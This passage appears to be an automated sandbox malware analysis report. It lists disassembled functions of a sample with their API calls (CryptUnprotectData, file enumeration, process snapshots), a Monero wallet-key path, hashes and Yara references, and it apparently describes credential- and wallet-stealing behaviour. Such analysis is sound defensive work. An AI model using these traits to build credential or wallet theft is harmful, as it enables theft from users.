                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EDDCC
                              • FindClose.KERNEL32(000000FF), ref: 009EDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 7def12d4b8d8435c6f30e9770c81dfc0795de9002465f148b0e4473a342b7cd0
                              • Instruction ID: bfe4084ddef5fd980812193d8768153f0f58c48ba675a8ecf01571fb61d271d0
                              • Opcode Fuzzy Hash: 7def12d4b8d8435c6f30e9770c81dfc0795de9002465f148b0e4473a342b7cd0
                              • Instruction Fuzzy Hash: 489167B2910108A7CB15FB70EC96FFD737DABC4340F408568F90A96191EE74AB49CB92
                              Function 00DAE5A3 Relevance: 12.9, Strings: 9, Instructions: 1664COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &3~~$&\=$3gZ$5)y$9w;7$:oo$R|6}$T|6}$z8-
                              • API String ID: 0-496644944
                              • Opcode ID: 27ea8262b94176998c339f81b9e5287da1cdc23c58085b251830670d6455c904
                              • Instruction ID: e7f7622fa7064822c4cddbf673f41fc080c2fc2acd52dfc7d6dae906b783fd4e
                              • Opcode Fuzzy Hash: 27ea8262b94176998c339f81b9e5287da1cdc23c58085b251830670d6455c904
                              • Instruction Fuzzy Hash: E5B22BF3A0C2109FE304AE2DEC8567ABBE5EFD4760F1A853DEAC4D3744E53598058692
                              Function 009F7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00A005AF), ref: 009F7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 009F7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 009F7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 009F7C62
                              • LocalFree.KERNEL32(00000000), ref: 009F7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 67189adb2af5176991b7de06451532f29284545321da2d1da422d8c009224139
                              • Instruction ID: bde9680a87dcb4a6f9832e371bfc48485c18ab8fc04000257d4fd3db5b01c1d6
                              • Opcode Fuzzy Hash: 67189adb2af5176991b7de06451532f29284545321da2d1da422d8c009224139
                              • Instruction Fuzzy Hash: 51413BB195021CABDB24DB94DC99BFEB378FF44700F204199E60962291DB742F86CFA1
                              Function 009EE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A00D73), ref: 009EE4A2
                              • StrCmpCA.SHLWAPI(?,00A014F8), ref: 009EE4F2
                              • StrCmpCA.SHLWAPI(?,00A014FC), ref: 009EE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: ed6d2ca9e1fc7d793905b3a574e3e52d47e8896f9033a19dbeda45068897f805
                              • Instruction ID: 084c3c301cfcad7776387ff4a5a6c82d772f612eda69676dc9884233d72a3bda
                              • Opcode Fuzzy Hash: ed6d2ca9e1fc7d793905b3a574e3e52d47e8896f9033a19dbeda45068897f805
                              • Instruction Fuzzy Hash: 5D122FB191011C9ADB19FB60DC96FFD7378AF94340F4045A9B60E96091EF706F89CBA2
                              Function 00DB3991 Relevance: 8.9, Strings: 6, Instructions: 1378COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #QSr$]+]N$n`}m$peU^$:~n$|s~
                              • API String ID: 0-2648097665
                              • Opcode ID: 17e2a1484c1986e4a149be27389fcdf42f710dd68022929bf710668904ed44bd
                              • Instruction ID: c340d18ea92a22b9693e1ed928d36fa04732e68ae7ea3681788c665b8446495f
                              • Opcode Fuzzy Hash: 17e2a1484c1986e4a149be27389fcdf42f710dd68022929bf710668904ed44bd
                              • Instruction Fuzzy Hash: 9E9205F360C2049FE304AE2DEC8567AB7E9EF94720F1A493DE6C5C3744EA7558018697
                              Function 00DBA0D2 Relevance: 7.9, Strings: 5, Instructions: 1630COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: '[wq$,3</$Ai%X$F^kk$_S?
                              • API String ID: 0-1790768242
                              • Opcode ID: b9bb3c02309c0157a4eb433fff5c52b92416708ac6d30855fa36e6594c751622
                              • Instruction ID: b43e1b6f1051eb2a2046ee633d0cf9814bc536b5f0ab0dc38ebc9890ac902327
                              • Opcode Fuzzy Hash: b9bb3c02309c0157a4eb433fff5c52b92416708ac6d30855fa36e6594c751622
                              • Instruction Fuzzy Hash: 5EB22AF3A0C2009FE304AE2DEC8567AF7D9EF94320F1A463DEAC5D7744E63598058696
                              Function 00DB1BD4 Relevance: 7.9, Strings: 5, Instructions: 1629COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: *e}$5c?$Dwo.$Yiv^${O%k
                              • API String ID: 0-424722185
                              • Opcode ID: 9589bb60eebf73047947323870f2b3bd006df95b1df0c596a658cd0b7629f79a
                              • Instruction ID: ac5fe71c08a5605081cf97f2046864f24dac5aeee589e9d1aaf6c35f8d926e2d
                              • Opcode Fuzzy Hash: 9589bb60eebf73047947323870f2b3bd006df95b1df0c596a658cd0b7629f79a
                              • Instruction Fuzzy Hash: 22B227F3A0C6149FD3046E2DEC8567AFBE9EF94720F1A4A3DEAC487744E63558018693
                              Function 009EC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 009EC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 009EC87C
                              • lstrcat.KERNEL32(?,00A00B46), ref: 009EC943
                              • lstrcat.KERNEL32(?,00A00B47), ref: 009EC957
                              • lstrcat.KERNEL32(?,00A00B4E), ref: 009EC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 502a1a34b38406729a6275d0692c78a6b087ca5a4626b4512e9e2aa1f881632a
                              • Instruction ID: 7d43f2d777969b7f5fbd2150715bb6d10ec743b7e6d98a61b88650f6c8f1d74a
                              • Opcode Fuzzy Hash: 502a1a34b38406729a6275d0692c78a6b087ca5a4626b4512e9e2aa1f881632a
                              • Instruction Fuzzy Hash: EE417CB591420EEBCB20CFA0DC89BFEB7B8BB48304F1045A8F509A62C0D7745A85CF91
                              Function 009E7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 009E724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009E7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009E7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009E72A4
                              • LocalFree.KERNEL32(?), ref: 009E72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: d17a63c3ccac5e4142e3a78b0362db83afa7ec391ed762131dbab0625580cea6
                              • Instruction ID: 972cbfc88619d214efd734e900ce1e18c3ceb978b1d33cd9a7eae1d13ee38aa1
                              • Opcode Fuzzy Hash: d17a63c3ccac5e4142e3a78b0362db83afa7ec391ed762131dbab0625580cea6
                              • Instruction Fuzzy Hash: 05011275A50208BBDB24DFD4DD46F9D7778EB44B04F104555FB05AB2C0D670AA018B65
                              Function 009F9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009F961E
                              • Process32First.KERNEL32(00A00ACA,00000128), ref: 009F9632
                              • Process32Next.KERNEL32(00A00ACA,00000128), ref: 009F9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 009F965C
                              • CloseHandle.KERNEL32(00A00ACA), ref: 009F967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 5b30d3b3fe00d4a269fc1a3f31363f2b66a6e06aab188495b5f13807ab8eaf29
                              • Instruction ID: 38406d9ee327ca01b57c56ddc4f38a75ef0ea559bd2d29bade8f979e93f228dd
                              • Opcode Fuzzy Hash: 5b30d3b3fe00d4a269fc1a3f31363f2b66a6e06aab188495b5f13807ab8eaf29
                              • Instruction Fuzzy Hash: 5C010C75A10208EBCB24DFA5CD48BEDB7F8EB48700F104198AA05D6280DB749B45CF51
                              Function 00DBD63B Relevance: 6.7, Strings: 4, Instructions: 1669COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1=Q$nV/$t*.$v}7
                              • API String ID: 0-1156221590
